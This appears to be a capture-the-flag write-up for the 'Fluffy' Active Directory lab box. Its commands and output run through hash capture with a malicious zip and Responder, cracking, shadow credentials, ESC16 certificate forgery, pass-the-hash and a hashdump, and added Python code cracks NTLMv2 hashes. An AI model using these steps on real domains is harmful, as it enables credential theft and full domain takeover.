Basic info

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

Port scan

No web ports, just the usual Windows domain controller ports (DNS, Kerberos, LDAP/LDAPS, SMB, RPC, WinRM). Note the clock-skew result at the bottom: the DC runs about 6h39m ahead of the scanner, which matters later for Kerberos.

$ nmap -sC -sV -Pn 10.10.11.69
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 15:25 JST
Nmap scan report for 10.10.11.69
Host is up (0.18s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-26 13:05:42Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-05-26T13:07:07+00:00; +6h38m55s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-26T13:07:05+00:00; +6h38m55s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-05-26T13:07:07+00:00; +6h38m55s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-26T13:07:05+00:00; +6h38m55s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h38m54s, deviation: 0s, median: 6h38m54s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-26T13:06:25
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.44 seconds

SMB

Using the provided credentials to browse the SMB shares, there is an IT share containing two programs in use plus a PDF:

Upgrade_Notice.pdf

The PDF lists some relevant vulnerabilities:

CVE-2025-24071 to p.agila

Following the hint in the PDF, the matching PoC was located:

Build a malicious zip with the PoC, upload it to the share, and capture p.agila's Net-NTLMv2 hash with Responder when the file is previewed on the target:

# build the zip with the PoC (-i is the IP of our Responder listener)
python3 exploit.py -f miao -i 10.10.14.13

# listen for the SMB authentication coming back from the target
sudo python3 Responder.py -i 10.10.14.13 -v

# from an smbclient session on the IT share
# put exploit.zip

Crack the captured Net-NTLMv2 hash (hashcat mode 5600) to recover the password:

sudo hashcat -m 5600 hash.txt ~/Tools/dict/rockyou.txt

prometheusx-303
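What hashcat mode 5600 actually computes, as an added example (not part of the original write-up or of any tool named here): an NT hash is MD4 over the UTF-16LE password, the NTLMv2 key is HMAC-MD5 of that hash over UPPER(user) + domain, and the NTProofStr that Responder captures is HMAC-MD5 of the NTLMv2 key over the server challenge plus the client blob. The server challenge and blob below are constructed sample values, not a real capture; the only hash lines that are real are the known MD4/NT test vectors in the comments. MD4 is implemented inline because hashlib on OpenSSL 3 builds frequently refuses the legacy algorithm.

```python
import hmac
import struct
from hashlib import md5
from typing import Iterable, Optional

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); MD4(b"") is 31d6cfe0d16ae931b73c59d7e0c089c0."""
    def rotl(x: int, n: int) -> int:
        return ((x << n) | (x >> (32 - n))) & MASK32

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    # padding: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2_order = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: F, no additive constant
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: G, constant 0x5A827999
            a, b, c, d = d, rotl((a + g(b, c, d) + x[r2_order[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: H, constant 0x6ED9EBA1
            a, b, c, d = d, rotl((a + h(b, c, d) + x[r3_order[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK32, (b0 + b) & MASK32, (c0 + c) & MASK32, (d0 + d) & MASK32
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    # NT("password") is 8846f7eaee8fb117ad06bdd830b7586c
    return md4(password.encode("utf-16-le"))


def ntlmv2_response(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5(NTLMv2 key, challenge || blob), NTLMv2 key = HMAC-MD5(NT hash, UPPER(user) || domain)."""
    ntlmv2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, md5).digest()


def hashcat_5600_line(user: str, domain: str, server_challenge: bytes, blob: bytes, proof: bytes) -> str:
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def parse_5600(line: str):
    user, _, domain, chal, proof, blob = line.strip().split(":", 5)
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def crack_5600(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on one hashcat-5600 line: recompute NTProofStr per candidate."""
    user, domain, chal, proof, blob = parse_5600(line)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_response(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed sample: the challenge and blob are made up, the password is the one this write-up recovers.
SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_PASSWORD = "p.agila", "FLUFFY", "prometheusx-303"
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = bytes.fromhex("0101000000000000") + bytes(24)


def sample_hash_line() -> str:
    proof = ntlmv2_response(SAMPLE_PASSWORD, SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_CHALLENGE, SAMPLE_BLOB)
    return hashcat_5600_line(SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_CHALLENGE, SAMPLE_BLOB, proof)


if __name__ == "__main__":
    line = sample_hash_line()
    print(line)
    print("cracked:", crack_5600(line, ["123456", "Password1", "prometheusx-303"]))
```

The point of the walk-through is the cost model: each candidate costs one MD4 plus two HMAC-MD5s and nothing is salted beyond the per-session challenge, which is why a rockyou run against a captured Net-NTLMv2 hash finishes in seconds for a weak password. It also shows why the captured hash cannot be relayed back to SMB here: the nmap output reports SMB signing required, so cracking is the only way to use it.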

bloodhound

Standard BloodHound collection and analysis with the cracked account:

bloodhound-python -u p.agila -p 'prometheusx-303' -d 'fluffy.htb' -ns 10.10.11.69 --zip -c All -dc 'dc01.fluffy.htb'

BloodHound shows that p.agila has GenericAll over the Service Accounts group:

and that the group's members have GenericWrite over one another:

p.agila to winrm_svc

So add p.agila to the group, then abuse the resulting GenericWrite for a shadow credentials attack: write msDS-KeyCredentialLink on each service account, authenticate via PKINIT with the key pair, and recover the account's NT hash. Kerberos tolerates only 5 minutes of clock skew and the DC is about 6h39m ahead of us (see the nmap clock-skew result), so the tools are run inside a faketime shell synced to the DC:

# sync our clock to the DC's HTTP Date header (WinRM on 5985 answers plain HTTP) for the Kerberos steps below
faketime "$(curl -sik http://10.10.11.69:5985 | grep -i 'Date: ' | sed s/'Date: '//g)" bash

# add p.agila to the SERVICE ACCOUNTS group (GenericAll on the group)
bloodyAD --host 10.10.11.69 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' 'p.agila'

# shadow credentials: write msDS-KeyCredentialLink on winrm_svc (GenericWrite via the group), PKINIT, and dump the NT hash
certipy-ad shadow auto -username p.agila@fluffy.htb -password 'prometheusx-303' -account winrm_svc

[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

# same for the other two service accounts
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

user flag

Log in over WinRM as winrm_svc with its NT hash (pass-the-hash):

evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767

ESC16 to root

This requires the latest certipy-ad; the ESC16 support has been merged into the official branch:

Running certipy find with the ca_svc hash reports ESC16 (the CA has the szOID_NTDS_CA_SECURITY_EXT SID extension disabled, so issued certificates carry no SID and the DC falls back to mapping them by UPN):

certipy find -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -target fluffy.htb -stdout -vulnerable

# relevant excerpt of the CA section
CA Name: fluffy-DC01-CA
DNS Name: DC01.fluffy.htb
Disabled Extensions: 1.3.6.1.4.1.311.25.2

Follow the Certipy wiki step by step, with p.agila as the attacker and ca_svc as the victim. ca_svc is chosen because p.agila (through the Service Accounts group) has GenericWrite over it, which is enough to rewrite its userPrincipalName; ca_svc's NT hash from the shadow credentials step is then used to enrol. The UPN is temporarily set to the target name, a certificate is requested (the CA copies the UPN into the SAN and, because of ESC16, adds no SID), the UPN is restored, and the certificate is used to authenticate as Administrator:

# make sure p.agila is (still) in SERVICE ACCOUNTS, which grants GenericWrite over ca_svc
bloodyAD --host 10.10.11.69 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' 'p.agila'

# read ca_svc's current UPN so it can be restored afterwards
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read

# change ca_svc's UPN to the target account name
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -target 'dc01.fluffy.htb' -upn 'administrator' -user 'ca_svc' update

# request a User-template certificate as ca_svc; the SAN gets the forged UPN and no SID extension
certipy req -dc-ip 10.10.11.69 -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

# restore the UPN (the issued certificate keeps the forged SAN)
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -target 'dc01.fluffy.htb' -upn 'ca_svc' -user 'ca_svc' update

# PKINIT with the certificate; the DC maps it to Administrator by UPN
certipy auth -pfx administrator.pfx -username 'administrator' -domain fluffy.htb -dc-ip 10.10.11.69

[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
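Why the forged UPN is accepted, as an added example that is not part of the write-up or of Certipy: a small model of the CA's issuance and of the KDC's certificate-to-account mapping, run across the four combinations of "CA disables the SID extension" and "DC in Full Enforcement mode" (KB5014754). The model is deliberately simplified (implicit UPN lookup, then sAMAccountName for a UPN without a realm suffix; a present SID extension must match the mapped account; an absent one is tolerated only outside Full Enforcement). The domain SID is constructed; the RIDs 500 and 1103 are the ones in this page's hashdump.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# szOID_NTDS_CA_SECURITY_EXT, the SID extension from KB5014754; the certipy output
# on this box lists exactly this OID as disabled on the CA.
SID_EXT_OID = "1.3.6.1.4.1.311.25.2"
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed, not the box's real domain SID


@dataclass
class Account:
    sam: str
    upn: str
    sid: str


@dataclass
class Cert:
    san_upn: str
    extensions: Dict[str, str] = field(default_factory=dict)  # OID -> value


@dataclass
class CA:
    disabled_extensions: Set[str]

    def issue(self, requester: Account) -> Cert:
        """User-template enrolment: the SAN UPN is copied from the requester's current
        userPrincipalName; the SID extension is added unless the CA disabled it (ESC16)."""
        cert = Cert(san_upn=requester.upn)
        if SID_EXT_OID not in self.disabled_extensions:
            cert.extensions[SID_EXT_OID] = requester.sid
        return cert


def map_certificate(cert: Cert, directory: List[Account], full_enforcement: bool) -> Optional[Account]:
    """Simplified model of the KDC's implicit certificate mapping plus the KB5014754 SID checks."""
    account = None
    for a in directory:
        if a.upn.lower() == cert.san_upn.lower():
            account = a
            break
        if "@" not in cert.san_upn and a.sam.lower() == cert.san_upn.lower():
            account = a
            break
    if account is None:
        return None
    cert_sid = cert.extensions.get(SID_EXT_OID)
    if cert_sid is not None:                      # strong mapping: SID in cert must match the account
        return account if cert_sid == account.sid else None
    return None if full_enforcement else account  # no SID: rejected only under Full Enforcement


def esc16_attack(ca: CA, victim: Account, target_sam: str) -> Cert:
    """The three certipy steps: account update -upn, req, account update (restore)."""
    original_upn = victim.upn
    victim.upn = target_sam      # GenericWrite on the victim lets the attacker rewrite its UPN
    cert = ca.issue(victim)      # the CA copies the forged UPN into the SAN
    victim.upn = original_upn    # clean up; the issued certificate keeps the forged SAN
    return cert


def make_directory() -> List[Account]:
    return [
        Account("Administrator", "Administrator@fluffy.htb", f"{DOMAIN_SID}-500"),
        Account("ca_svc", "ca_svc@fluffy.htb", f"{DOMAIN_SID}-1103"),
    ]


def run_scenarios() -> Dict[Tuple[bool, bool], Optional[str]]:
    """Who the DC believes is authenticating, keyed by (SID extension disabled on CA, Full Enforcement on DC)."""
    results: Dict[Tuple[bool, bool], Optional[str]] = {}
    for sid_ext_disabled in (True, False):
        for full_enforcement in (False, True):
            directory = make_directory()
            ca = CA(disabled_extensions={SID_EXT_OID} if sid_ext_disabled else set())
            victim = next(a for a in directory if a.sam == "ca_svc")
            cert = esc16_attack(ca, victim, "administrator")
            mapped = map_certificate(cert, directory, full_enforcement)
            results[(sid_ext_disabled, full_enforcement)] = mapped.sam if mapped else None
    return results


if __name__ == "__main__":
    for (disabled, enforced), who in run_scenarios().items():
        print(f"SID ext disabled={disabled!s:5} full enforcement={enforced!s:5} -> {who}")
```

Only the first row (extension disabled, DC not enforcing) yields Administrator, which is the state of this box. A CA that still adds the SID extension makes the forged UPN useless because the SID in the certificate points back at ca_svc, and a DC in Full Enforcement rejects the SID-less certificate regardless of what the CA did; either fix closes ESC16.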

root flag

Log in with the Administrator NT hash:

evil-winrm -i 10.10.11.69 -u Administrator -H 8da83a3fa618b6e3a00e93f676c92a6e

hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c3442d41139f13bd02f0695d56362b9:::
ca_svc:1103:aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8:::
ldap_svc:1104:aad3b435b51404eeaad3b435b51404ee:22151d74ba3de931a352cba1f9393a37:::
p.agila:1601:aad3b435b51404eeaad3b435b51404ee:a51fede5012110e9a65bd3f470513867:::
winrm_svc:1603:aad3b435b51404eeaad3b435b51404ee:33bd09dcd697600edf6b3a7af4875767:::
j.coffey:1605:aad3b435b51404eeaad3b435b51404ee:dff933046fa0943ac993d35a054235e3:::
j.fleischman:1606:aad3b435b51404eeaad3b435b51404ee:10842ead8d1d060a2de1394e4b2ea460:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7a9950c26fe9c3cbfe5b9ceaa21c9bfd:::
meterpreter >
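A small triage pass over the dump above, as an added example that is not part of the write-up: parse the user:rid:lm:nt::: lines and flag what an assessor reports from them (blank NT hashes, LM hashes actually stored, NT hash reuse across accounts, machine accounts). The sample input is the dump from this page with the meterpreter prompt left in to show it is skipped.

```python
import re
from collections import defaultdict
from typing import Dict, List

# the hashdump from this page, prompt lines included
SAMPLE_DUMP = """\
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c3442d41139f13bd02f0695d56362b9:::
ca_svc:1103:aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8:::
ldap_svc:1104:aad3b435b51404eeaad3b435b51404ee:22151d74ba3de931a352cba1f9393a37:::
p.agila:1601:aad3b435b51404eeaad3b435b51404ee:a51fede5012110e9a65bd3f470513867:::
winrm_svc:1603:aad3b435b51404eeaad3b435b51404ee:33bd09dcd697600edf6b3a7af4875767:::
j.coffey:1605:aad3b435b51404eeaad3b435b51404ee:dff933046fa0943ac993d35a054235e3:::
j.fleischman:1606:aad3b435b51404eeaad3b435b51404ee:10842ead8d1d060a2de1394e4b2ea460:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7a9950c26fe9c3cbfe5b9ceaa21c9bfd:::
meterpreter >
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string: LM is not stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I)


def parse_dump(text: str) -> List[Dict[str, str]]:
    """Keep only well-formed hash lines; prompts and noise are dropped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["lm"], e["nt"] = e["lm"].lower(), e["nt"].lower()
            entries.append(e)
    return entries


def audit(entries: List[Dict[str, str]]) -> Dict[str, object]:
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "blank_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_hash_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "machine_accounts": [e["user"] for e in entries if e["user"].endswith("$")],
        # the same NT hash on two accounts means the same password (NT hashes are unsalted)
        "reused_nt": {nt: users for nt, users in by_nt.items() if len(users) > 1},
    }


if __name__ == "__main__":
    for key, value in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

On this dump the only finding is the blank-password Guest account (built-in and normally disabled); no LM hashes are stored and no password is shared between accounts. The krbtgt hash is the one to protect: with it, Golden Tickets survive every other password reset.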

References